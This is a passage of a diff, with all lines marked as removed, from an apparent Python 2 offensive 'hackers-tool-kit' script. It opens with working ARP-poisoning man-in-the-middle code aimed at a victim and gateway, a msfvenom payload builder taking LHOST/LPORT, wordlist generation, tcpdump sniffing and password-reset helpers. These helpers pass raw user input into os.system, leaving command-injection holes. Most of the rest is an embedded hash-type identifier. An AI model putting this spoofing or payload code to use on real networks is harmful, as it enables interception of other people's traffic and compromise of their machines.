gateIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = gateMAC), count = 7) - print "[*] Disabling IP Forwarding..." - os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") - print "[*] Shutting Down..." - os.system("clear") - mainbanner() - - def trick(gm, vm): - send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst= vm)) - send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst= gm)) - - def mitm(): - try: - victimMAC = get_mac(victimIP) - except Exception: - os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") - print "[!] Couldn't Find Victim MAC Address" - print "[!] Exiting..." - os.system("clear") - mainbanner() - try: - gateMAC = get_mac(gateIP) - except Exception: - os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") - print "[!] Couldn't Find Gateway MAC Address" - print "[!] Exiting..." - os.system("clear") - mainbanner() - print "[*] Poisoning Targets..." - while 1: - try: - trick(gateMAC, victimMAC) - time.sleep(1.5) - except KeyboardInterrupt: - reARP() - break - mitm() -def sslscan(): - j = raw_input('Enter Target: ') - a = 'sslscan {0}'.format(j) - os.system(a) -def payload(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - print "\n" - f = raw_input("Select Payload: ") - l = raw_input("LHOST: ") - c = raw_input("LPORT: ") - os.system("cat /root/hackers-tool-kit/tools/formats.txt") - s = raw_input("Format: ") - h = raw_input("File Name: ") - a = 'msfvenom -p {0} LHOST={1} LPORT={2} -f {3} -o /root/{4}.{5}'.format(f,l,c,s,h,s) - os.system(a) -def crunch(): - print "minimal number of characters" - j = raw_input("[CRUNCH]: ") - print "maximum number of characters" - k = raw_input("[CRUNCH]: ") - print "what characters should be in it" - b = raw_input("[CRUNCH]: ") - print "name of file" - s = raw_input("[CRUNCH]: ") - a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) - os.system(a) - print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s -def traff(): - os.system("iwconfig") - s = raw_input("Select Interface: ") - os.system("tcpdump -i " + s) -def resa(): - j = raw_input("USERNAME: ") - k = raw_input("NEW PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'echo "{0}:{1}" | chpasswd'.format(j,k) - print "password for {0} has been reset".format(j) -def resu(): - j = raw_input("PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'passwd {0}'.format(j) - print "unix password has been reset".format(j) -def hashid(): - #!/usr/bin/python - # encoding: utf-8 - # Hash Identifier v1.1 - # By Zion3R - # www.Blackploit.com - # Root@Blackploit.com - - logo=''' ######################################################################### - # __ __ __ ______ _____ # - # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # - # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # - # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # - # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # - # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # - # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # - # By Zion3R # - # www.Blackploit.com # - # Root@Blackploit.com # - #########################################################################''' - - algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} - - # hash.islower() minusculas - # hash.isdigit() numerico - # hash.isalpha() letras - # hash.isalnum() alfanumerico - - def CRC16(): - hs='4607' - if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101020") - def CRC16CCITT(): - hs='3d08' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101040") - def FCS16(): - hs='0e5b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101060") - - def CRC32(): - hs='b33fd057' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102040") - def ADLER32(): - hs='0607cb42' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102020") - def CRC32B(): - hs='b764a0d9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102060") - def XOR32(): - hs='0000003f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102080") - - def GHash323(): - hs='80000000' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103040") - def GHash325(): - hs='85318985' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103020") - - def DESUnix(): - hs='ZiY8YtDKXJwYQ' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: - jerar.append("104020") - - def MD5Half(): - hs='ae11fd697ec92c7c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105060") - def MD5Middle(): - hs='7ec92c7c98de3fac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105040") - def MySQL(): - hs='63cea4673fd25f46' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105020") - - def DomainCachedCredentials(): - hs='f42005ec1afe77967cbc83dce1b4d714' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106025") - def Haval128(): - hs='d6e3ec49aa0f138a619f27609022df10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106160") - def Haval128HMAC(): - hs='3ce8b0ffd75bc240fc7d967729cd6637' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106165") - def MD2(): - hs='08bbef4754d98806c373f2cd7d9a43c4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106060") - def MD2HMAC(): - hs='4b61b72ead2b0eb0fa3b8a56556a6dca' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106120") - def MD4(): - hs='a2acde400e61410e79dacbdfc3413151' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106040") - def MD4HMAC(): - hs='6be20b66f2211fe937294c1c95d1cd4f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106100") - def MD5(): - hs='ae11fd697ec92c7c98de3fac23aba525' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106020") - def MD5HMAC(): - hs='d57e43d2c7e397bf788f66541d6fdef9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106080") - def MD5HMACWordpress(): - hs='3f47886719268dfa83468630948228f6' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106140") - def NTLM(): - hs='cc348bace876ea440a28ddaeb9fd3550' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106029") - def RAdminv2x(): - hs='baea31c728cbf0cd548476aa687add4b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106027") - def RipeMD128(): - hs='4985351cd74aff0abc5a75a0c8a54115' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106180") - def RipeMD128HMAC(): - hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106185") - def SNEFRU128(): - hs='4fb58702b617ac4f7ca87ec77b93da8a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106200") - def SNEFRU128HMAC(): - hs='59b2b9dcc7a9a7d089cecf1b83520350' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106205") - def Tiger128(): - hs='c086184486ec6388ff81ec9f23528727' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106220") - def Tiger128HMAC(): - hs='c87032009e7c4b2ea27eb6f99723454b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106225") - def md5passsalt(): - hs='5634cc3b922578434d6e9342ff5913f7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106240") - def md5saltmd5pass(): - hs='245c5763b95ba42d4b02d44bbcd916f1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106260") - def md5saltpass(): - hs='22cc5ce1a1ef747cd3fa06106c148dfa' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106280") - def md5saltpasssalt(): - hs='469e9cdcaff745460595a7a386c4db0c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106300") - def md5saltpassusername(): - hs='9ae20f88189f6e3a62711608ddb6f5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106320") - def md5saltmd5pass(): - hs='aca2a052962b2564027ee62933d2382f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106340") - def md5saltmd5passsalt(): - hs='de0237dc03a8efdf6552fbe7788b2fdd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106360") - def md5saltmd5passsalt(): - hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106380") - def md5saltmd5saltpass(): - hs='d8f3b3f004d387086aae24326b575b23' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106400") - def md5saltmd5md5passsalt(): - hs='81f181454e23319779b03d74d062b1a2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106420") - def md5username0pass(): - hs='e44a60f8f2106492ae16581c91edb3ba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106440") - def md5usernameLFpass(): - hs='654741780db415732eaee12b1b909119' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106460") - def md5usernamemd5passsalt(): - hs='954ac5505fd1843bbb97d1b2cda0b98f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106480") - def md5md5pass(): - hs='a96103d267d024583d5565436e52dfb3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106500") - def md5md5passsalt(): - hs='5848c73c2482d3c2c7b6af134ed8dd89' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106520") - def md5md5passmd5salt(): - hs='8dc71ef37197b2edba02d48c30217b32' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106540") - def md5md5saltpass(): - hs='9032fabd905e273b9ceb1e124631bd67' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106560") - def md5md5saltmd5pass(): - hs='8966f37dbb4aca377a71a9d3d09cd1ac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106580") - def md5md5usernamepasssalt(): - hs='4319a3befce729b34c3105dbc29d0c40' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106600") - def md5md5md5pass(): - hs='ea086739755920e732d0f4d8c1b6ad8d' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106620") - def md5md5md5md5pass(): - hs='02528c1f2ed8ac7d83fe76f3cf1c133f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106640") - def md5md5md5md5md5pass(): - hs='4548d2c062933dff53928fd4ae427fc0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106660") - def md5sha1pass(): - hs='cb4ebaaedfd536d965c452d9569a6b1e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106680") - def md5sha1md5pass(): - hs='099b8a59795e07c334a696a10c0ebce0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106700") - def md5sha1md5sha1pass(): - hs='06e4af76833da7cc138d90602ef80070' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106720") - def md5strtouppermd5pass(): - hs='519de146f1a658ab5e5e2aa9b7d2eec8' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106740") - - def LineageIIC4(): - hs='0x49a57f66bd3d5ba6abda5579c264a0e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: - jerar.append("107080") - def MD5phpBB3(): - hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: - jerar.append("107040") - def MD5Unix(): - hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: - jerar.append("107060") - def MD5Wordpress(): - hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: - jerar.append("107020") - - def MD5APR(): - hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: - jerar.append("108020") - - def Haval160(): - hs='a106e921284dd69dad06192a4411ec32fce83dbb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109100") - def Haval160HMAC(): - hs='29206f83edc1d6c3f680ff11276ec20642881243' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109200") - def MySQL5(): - hs='9bb2fb57063821c762cc009f7584ddae9da431ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109040") - def MySQL160bit(): - hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: - jerar.append("109060") - def RipeMD160(): - hs='dc65552812c66997ea7320ddfb51f5625d74721b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109120") - def RipeMD160HMAC(): - hs='ca28af47653b4f21e96c1235984cb50229331359' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109180") - def SHA1(): - hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109020") - def SHA1HMAC(): - hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109140") - def SHA1MaNGOS(): - hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109220") - def SHA1MaNGOS2(): - hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109240") - def Tiger160(): - hs='c086184486ec6388ff81ec9f235287270429b225' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109080") - def Tiger160HMAC(): - hs='6603161719da5e56e1866e4f61f79496334e6a10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109160") - def sha1passsalt(): - hs='f006a1863663c21c541c8d600355abfeeaadb5e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109260") - def sha1saltpass(): - hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109280") - def sha1saltmd5pass(): - hs='860465ede0625deebb4fbbedcb0db9dc65faec30' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109300") - def sha1saltmd5passsalt(): - hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109320") - def sha1saltsha1pass(): - hs='58714327f9407097c64032a2fd5bff3a260cb85f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109340") - def sha1saltsha1saltsha1pass(): - hs='cc600a2903130c945aa178396910135cc7f93c63' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109360") - def sha1usernamepass(): - hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109380") - def sha1usernamepasssalt(): - hs='00025111b3c4d0ac1635558ce2393f77e94770c5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109400") - def sha1md5pass(): - hs='fa960056c0dea57de94776d3759fb555a15cae87' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("1094202") - def sha1md5passsalt(): - hs='1dad2b71432d83312e61d25aeb627593295bcc9a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109440") - def sha1md5sha1pass(): - hs='8bceaeed74c17571c15cdb9494e992db3c263695' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109460") - def sha1sha1pass(): - hs='3109b810188fcde0900f9907d2ebcaa10277d10e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109480") - def sha1sha1passsalt(): - hs='780d43fa11693b61875321b6b54905ee488d7760' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109500") - def sha1sha1passsubstrpass03(): - hs='5ed6bc680b59c580db4a38df307bd4621759324e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109520") - def sha1sha1saltpass(): - hs='70506bac605485b4143ca114cbd4a3580d76a413' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109540") - def sha1sha1sha1pass(): - hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109560") - def sha1strtolowerusernamepass(): - hs='79f575543061e158c2da3799f999eb7c95261f07' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109580") - - def Haval192(): - hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110040") - def Haval192HMAC(): - hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110080") - def Tiger192(): - hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110020") - def Tiger192HMAC(): - hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110060") - - def MD5passsaltjoomla1(): - hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("112020") - - def SHA1Django(): - hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: - jerar.append("113020") - - def Haval224(): - hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114040") - def Haval224HMAC(): - hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114080") - def SHA224(): - hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114020") - def SHA224HMAC(): - hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114060") - - def SHA256(): - hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115020") - def SHA256HMAC(): - hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115120") - def Haval256(): - hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115040") - def Haval256HMAC(): - hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115140") - def GOSTR341194(): - hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115060") - def RipeMD256(): - hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115080") - def RipeMD256HMAC(): - hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115160") - def SNEFRU256(): - hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115100") - def SNEFRU256HMAC(): - hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115180") - def SHA256md5pass(): - hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115200") - def SHA256sha1pass(): - hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115220") - - def MD5passsaltjoomla2(): - 